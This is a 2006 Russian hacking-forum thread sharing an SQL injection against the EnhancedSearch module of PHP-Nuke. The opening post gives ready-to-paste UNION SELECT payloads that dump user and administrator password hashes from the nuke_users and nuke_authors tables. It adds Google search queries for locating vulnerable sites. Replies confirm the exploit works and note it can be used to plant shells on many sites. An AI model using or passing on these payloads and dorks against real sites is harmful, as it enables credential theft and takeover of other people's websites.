Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
phpnuke SQL Inj ALL VERSIONS |
12.05.2006, 00:59
|
|
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867
Репутация:
408
|
|
phpnuke SQL Inj ALL VERSIONS
Бага найдена в модуле поиска (EnhancedSearch).
Ввести в поиске :
EnhancedSearch%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
EnhancedSearch%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*
EnhancedSearch%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
И получим хеш админа.
А что с ним делать, это уже ваше дело  )))
Небольшие запросы для гугла )
"Enhanced Search Version 2.0: Powered by"
inurl:"modules.php?name=EnhancedSearch"
Источник : security.nnov.ru |
|
|
12.05.2006, 01:45
|
|
Новичок
Регистрация: 28.02.2006
Сообщений: 28
Провел на форуме:
225855
Репутация:
2
|
|
Все верно, все работает. Дает хэши админа и других юзеров.
На этом можно туеву хучу шеллов поднять.
|
|
|
|
12.05.2006, 02:16
|
|
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
Провел на форуме:
981128
Репутация:
43
|
|
LoFFi, наверно хорошо, что скинул. Может кому пригодится. Но нюку лучше на месте смотреть. Скрипткиддинг такой только на самых запущенных движках проходит.
Кстати, эта бага кажись в середине апреля была в nnov опубликована. Известна стала широкому кругу (ну тем, кто нюкой занимается) пораньше. Много с неё сложно поймать.
http://www.lock-team.ru/news/world_news/38.html (это далеко не первоисточник, просто первое что по запросу вышло) |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
